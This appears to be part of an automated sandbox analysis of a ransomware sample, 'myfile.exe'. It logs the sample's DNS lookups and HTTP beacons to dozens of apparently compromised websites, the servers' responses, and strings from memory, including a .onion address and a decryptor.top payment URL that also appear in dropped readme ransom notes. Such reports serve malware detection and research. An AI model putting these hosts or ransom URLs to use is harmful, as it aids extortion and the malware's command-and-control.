            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /content/images/gv.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: karnesstanleyhvac.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: altitudetrampolinepark.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.altitudetrampolinepark.com
            Source: global trafficHTTP traffic detected: GET /static/tmp/vd.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.lexced.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: princebet88.site
            Source: global trafficHTTP traffic detected: GET /admin/game/gatm.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.georgemuncey.com
            Source: global trafficHTTP traffic detected: GET /wp-content/game/doiathwnvkwf.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.mieleshopping.it
            Source: global trafficHTTP traffic detected: GET /news/temp/wpuatzictpgv.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.hostaletdelsindians.es
            Source: global trafficHTTP traffic detected: GET /content/assets/jlbaveucagau.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.almamidwifery.com
            Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://www.lexced.com/#website","url":"https://www.lexced.com/","name":"LexCED","description":"Banca dati giuridica","publisher":{"@id":"https://www.lexced.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.lexced.com/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Organization","@id":"https://www.lexced.com/#organization","name":"LexCED","url":"https://www.lexced.com/","logo":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https://www.lexced.com/#/schema/logo/image/","url":"https://www.lexced.com/wp-content/uploads/2018/08/lexced-banca-dati-giuridica.jpg","contentUrl":"https://www.lexced.com/wp-content/uploads/2018/08/lexced-banca-dati-giuridica.jpg","width":250,"height":60,"caption":"LexCED"},"image":{"@id":"https://www.lexced.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/lexced.it/"]}]}</script> equals www.facebook.com (Facebook)
            Source: myfile.exe, 00000000.00000003.2589188241.0000000002C33000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894563140.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589424950.0000000005B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" lang="en-US" > equals www.facebook.com (Facebook)
            Source: myfile.exe, 00000000.00000003.2589450602.0000000005B15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: chomiksy.netns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" lang="en-US" > equals www.facebook.com (Facebook)
            Source: myfile.exe, 00000000.00000003.2589450602.0000000005B15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" lang="en-US" > equals www.facebook.com (Facebook)
            Source: global trafficDNS traffic detected: DNS query: parksideseniorliving.net
            Source: global trafficDNS traffic detected: DNS query: 90nguyentuan.com
            Source: global trafficDNS traffic detected: DNS query: enactusnhlstenden.com
            Source: global trafficDNS traffic detected: DNS query: avisioninthedesert.com
            Source: global trafficDNS traffic detected: DNS query: lashandbrowenvy.com
            Source: global trafficDNS traffic detected: DNS query: satoblog.org
            Source: global trafficDNS traffic detected: DNS query: rsidesigns.com
            Source: global trafficDNS traffic detected: DNS query: pansionatblago.ru
            Source: global trafficDNS traffic detected: DNS query: magrinya.net
            Source: global trafficDNS traffic detected: DNS query: baikalflot.ru
            Source: global trafficDNS traffic detected: DNS query: bd2fly.com
            Source: global trafficDNS traffic detected: DNS query: business-basic.de
            Source: global trafficDNS traffic detected: DNS query: afbudsrejserallinclusive.dk
            Source: global trafficDNS traffic detected: DNS query: m2graph.fr
            Source: global trafficDNS traffic detected: DNS query: stanleyqualitysystems.com
            Source: global trafficDNS traffic detected: DNS query: karnesstanleyhvac.com
            Source: global trafficDNS traffic detected: DNS query: altitudeboise.com
            Source: global trafficDNS traffic detected: DNS query: altitudetrampolinepark.com
            Source: global trafficDNS traffic detected: DNS query: www.altitudetrampolinepark.com
            Source: global trafficDNS traffic detected: DNS query: lexced.com
            Source: global trafficDNS traffic detected: DNS query: www.lexced.com
            Source: global trafficDNS traffic detected: DNS query: chainofhopeeurope.eu
            Source: global trafficDNS traffic detected: DNS query: bayshoreelite.com
            Source: global trafficDNS traffic detected: DNS query: mursall.de
            Source: global trafficDNS traffic detected: DNS query: amelielecompte.wordpress.com
            Source: global trafficDNS traffic detected: DNS query: wribrazil.com
            Source: global trafficDNS traffic detected: DNS query: testitjavertailut.net
            Source: global trafficDNS traffic detected: DNS query: princebet88.site
            Source: global trafficDNS traffic detected: DNS query: chomiksy.net
            Source: global trafficDNS traffic detected: DNS query: vitoriaecoturismo.com.br
            Source: global trafficDNS traffic detected: DNS query: georgemuncey.com
            Source: global trafficDNS traffic detected: DNS query: www.georgemuncey.com
            Source: global trafficDNS traffic detected: DNS query: funworx.de
            Source: global trafficDNS traffic detected: DNS query: nbva.co.uk
            Source: global trafficDNS traffic detected: DNS query: c-sprop.com
            Source: global trafficDNS traffic detected: DNS query: relevantonline.eu
            Source: global trafficDNS traffic detected: DNS query: abulanov.com
            Source: global trafficDNS traffic detected: DNS query: maxcube24.com.ua
            Source: global trafficDNS traffic detected: DNS query: kenmccallum.com
            Source: global trafficDNS traffic detected: DNS query: stage-infirmier.fr
            Source: global trafficDNS traffic detected: DNS query: skoczynski.eu
            Source: global trafficDNS traffic detected: DNS query: mieleshopping.it
            Source: global trafficDNS traffic detected: DNS query: www.mieleshopping.it
            Source: global trafficDNS traffic detected: DNS query: holocine.de
            Source: global trafficDNS traffic detected: DNS query: oscommunity.de
            Source: global trafficDNS traffic detected: DNS query: ikadomus.com
            Source: global trafficDNS traffic detected: DNS query: bundan.com
            Source: global trafficDNS traffic detected: DNS query: davedavisphotos.com
            Source: global trafficDNS traffic detected: DNS query: activeterroristwarningcompany.com
            Source: global trafficDNS traffic detected: DNS query: hostaletdelsindians.es
            Source: global trafficDNS traffic detected: DNS query: www.hostaletdelsindians.es
            Source: global trafficDNS traffic detected: DNS query: almamidwifery.com
            Source: global trafficDNS traffic detected: DNS query: www.almamidwifery.com
            Source: global trafficDNS traffic detected: DNS query: innervisions-id.com
            Source: unknownHTTP traffic detected: POST /admin/temp/eghuey.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: parksideseniorliving.net
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Sep 2024 10:07:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Cache-Enabled: TrueX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockLink: <https://parksideseniorliving.net/wp-json/>; rel="https://api.w.org/"X-Httpd-Modphp: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Sep 2024 10:07:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, must-revalidate, max-age=0content-security-policy: upgrade-insecure-requestsexpires: Wed, 11 Jan 1984 05:00:00 GMTlink: <https://lashandbrowenvy.com/wp-json/>; rel="https://api.w.org/"strict-transport-security: max-age=300strict-transport-security: max-age=31536000; includeSubDomainsx-cacheproxy-retries: 0/2x-content-type-options: nosniffx-fawn-proc-count: 1,0,24x-php-version: 8.0x-xss-protection: 1; mode=blockx-backend: varnish_sslCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8c065e8d9c134390-EWRalt-svc: h3=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Sep 2024 10:07:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.3Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: PHPSESSID=3846c15c8bd216c772f1d36ac5b4868d; path=/
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Mon, 09 Sep 2024 10:07:11 GMTServer: ApacheX-Powered-By: PHP/8.0.30Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://magrinya.net/wp-json/>; rel="https://api.w.org/"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://www.afbudsrejserallinclusive.dk/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Mon, 09 Sep 2024 10:07:14 GMTserver: LiteSpeedvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Sep 2024 10:07:17 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://karnesstanleyhvac.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Sep 2024 10:07:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/8.3.11Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.lexced.com/wp-json/>; rel="https://api.w.org/"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Sep 2024 10:07:24 GMTServer: Apache/2.4.61 (Debian)Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.chainofhopeeurope.eu/wp-json/>; rel="https://api.w.org/"Upgrade: h2Connection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Sep 2024 10:07:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, must-revalidate, max-age=0content-security-policy: upgrade-insecure-requestsexpires: Wed, 11 Jan 1984 05:00:00 GMTlink: <https://bayshoreelite.com/wp-json/>; rel="https://api.w.org/"strict-transport-security: max-age=300strict-transport-security: max-age=31536000; includeSubDomainsx-cacheproxy-retries: 0/2x-content-type-options: nosniffx-fawn-proc-count: 1,0,24x-php-version: 7.4x-xss-protection: 1; mode=blockx-backend: varnish_sslCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8c065f050cc80c7e-EWRalt-svc: h3=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Sep 2024 10:07:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.23Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0x-frame-options: denyx-xss-protection: 1; mode=blockx-content-type-options: nosniffstrict-transport-security: max-age=31536000; includeSubDomainsreferrer-policy: no-referrerpermissions-policy: accelerometer=(); ambient-light-sensor=(); autoplay=(self); camera=(); encrypted-media=(); fullscreen; geolocation=(self); gyroscope=(); magnetometer=(); microphone=(); midi=(); payment=(); picture-in-picture=(self); speaker=(); usb=(); vr=()content-security-policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' https: data: *.mursall.de;WPO-Cache-Status: not cachedWPO-Cache-Message: The request method was not GET (POST)Link: <https://mursall.de/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encoding
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Sep 2024 10:07:31 GMTContent-Type: text/htmlContent-Length: 146Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.15.8.3Date: Mon, 09 Sep 2024 10:07:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-store,no-cachePragma: no-cacheSet-Cookie: TiPMix=77.60889268289033; path=/; HttpOnly; Domain=fabrik-hosted-ne.azurewebsites.net; Max-Age=3600; Secure; SameSite=NoneSet-Cookie: x-ms-routing-name=self; path=/; HttpOnly; Domain=fabrik-hosted-ne.azurewebsites.net; Max-Age=3600; Secure; SameSite=NoneStrict-Transport-Security: max-age=2592000Request-Context: appId=cid-v1:64640e46-9cd2-4413-9485-c7395dd99be8x-azure-ref: 20240909T100733Z-15855465dc7b6hwv4tcxcnnqr00000000r1g000000005u3bX-Cache: CONFIG_NOCACHE
            Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://nbva.co.uk/wp-json/>; rel="https://api.w.org/"x-litespeed-tag: 799_HTTP.404,799_HTTP.503x-litespeed-cache-control: no-cachetransfer-encoding: chunkeddate: Mon, 09 Sep 2024 10:07:36 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Sep 2024 10:07:37 GMTContent-Type: text/htmlContent-Length: 146Connection: closeX-Seen-By: T7xPrjRFKDMHVv938PYVfx9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLho2HUitPUf9N0/utZJ1PDYm++C2XkuTvnlRFg2XiSDLServer: PepyakaX-Wix-Request-Id: 1725876457.2921179646686126538X-Content-Type-Options: nosniff
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Sep 2024 10:07:38 GMTServer: Apache/2Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://relevantonline.eu/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encoding,User-AgentTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.23.2Date: Mon, 09 Sep 2024 10:07:39 GMTContent-Type: text/htmlContent-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Sep 2024 10:07:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.maxcube24.com.ua/wp-json/>; rel="https://api.w.org/"Set-Cookie: PHPSESSID=q0okjhjaa24blp8vp04qd91mr0; path=/Set-Cookie: qtrans_front_language=ru; expires=Tue, 09-Sep-2025 10:07:41 GMT; path=/x-ray: wnp48936:0.740/wn48936:0.750/wa48936:D=744868
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Sep 2024 10:07:43 GMTContent-Type: text/htmlContent-Length: 146Connection: closeVary: Accept-Encoding
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Sep 2024 10:07:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Cache-Enabled: TrueLink: <https://www.mieleshopping.it/wp-json/>; rel="https://api.w.org/"X-Httpd: 1Host-Header: 6b7412fb82ca5edfd0917e3957f05d89X-Proxy-Cache: MISSX-Proxy-Cache-Info: 0 NC:000000 UP:
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Sep 2024 10:07:49 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://holocine.de/wp-json/>; rel="https://api.w.org/"Strict-Transport-Security: max-age=31556926Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Sep 2024 10:07:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.bundan.com/wp-json/>; rel="https://api.w.org/"X-Httpd: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Sep 2024 10:07:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.hostaletdelsindians.es/wp-json/>; rel="https://api.w.org/"Set-Cookie: zqwa_uQECbpt=7mTe2o%2A_SgNr; expires=Tue, 10-Sep-2024 10:07:57 GMT; Max-Age=86400; path=/; secureSet-Cookie: wXaScyxWbh=0%5B%2AH5P1SW; expires=Tue, 10-Sep-2024 10:07:57 GMT; Max-Age=86400; path=/; secureVary: Accept-EncodingServer-Optimized-By: La Tecla
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAge: 0Content-Type: text/html;charset=utf-8Date: Mon, 09 Sep 2024 10:08:00 GMTEtag: W/"f874205c86e2e2d9f4f9b0288f247fda"Expires: Thu, 01 Jan 1970 00:00:00 GMTServer: SquarespaceSet-Cookie: crumb=Bb/l+1uJErrZNDQ5YjJkNTNmYWQ1MmIwMTQzNzY3NGE2ODAxZDk2;Secure;Path=/Strict-Transport-Security: max-age=0Vary: Accept-EncodingX-Content-Type-Options: nosniffX-Contextid: erdXcnZq/387pIfGCConnection: closeTransfer-Encoding: chunked
            Source: myfile.exe, 00000000.00000003.1647825574.0000000002C40000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1647839842.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1889990480.0000000002C52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/
            Source: myfile.exe, 00000000.00000003.1934915360.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589188241.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2155301553.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1942076208.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1980534561.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2008810311.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890024433.0000000002C45000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2025165555.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890097726.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894500583.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890052478.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, g165067x37-readme.txt37.0.dr, g165067x37-readme.txt16.0.dr, g165067x37-readme.txt29.0.dr, g165067x37-readme.txt4.0.dr, g165067x37-readme.txt56.0.dr, g165067x37-readme.txt23.0.dr, g165067x37-readme.txt61.0.dr, g165067x37-readme.txt45.0.dr, g165067x37-readme.txt62.0.dr, g165067x37-readme.txt32.0.drString found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: myfile.exe, 00000000.00000003.1647825574.0000000002C40000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1647839842.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1889990480.0000000002C52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://decryptor.top/
            Source: myfile.exe, 00000000.00000003.1934915360.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589188241.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2155301553.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1942076208.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1980534561.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2008810311.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890024433.0000000002C45000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2025165555.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890097726.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894500583.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890052478.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, g165067x37-readme.txt37.0.dr, g165067x37-readme.txt16.0.dr, g165067x37-readme.txt29.0.dr, g165067x37-readme.txt4.0.dr, g165067x37-readme.txt56.0.dr, g165067x37-readme.txt23.0.dr, g165067x37-readme.txt61.0.dr, g165067x37-readme.txt45.0.dr, g165067x37-readme.txt62.0.dr, g165067x37-readme.txt32.0.drString found in binary or memory: http://decryptor.top/1A63B2FBDC010061
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://images.squarespace-cdn.com/content/v1/5ad68080a9e028226c1155ed/1526923138735-EF8ZSSLD6TS2M24B
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://m2graph.fr
            Source: myfile.exe, 00000000.00000003.2468286003.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589691593.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2556494998.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://m2graph.fr/F
            Source: myfile.exe, 00000000.00000003.2589450602.0000000005B15000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589450602.0000000005B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://opengraphprotocol.org/schema/
            Source: myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://opensource.org/licenses/MIT
            Source: myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stayblue.basecom.eu
            Source: myfile.exe, 00000000.00000003.2354771647.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://90nguyentuan.com/
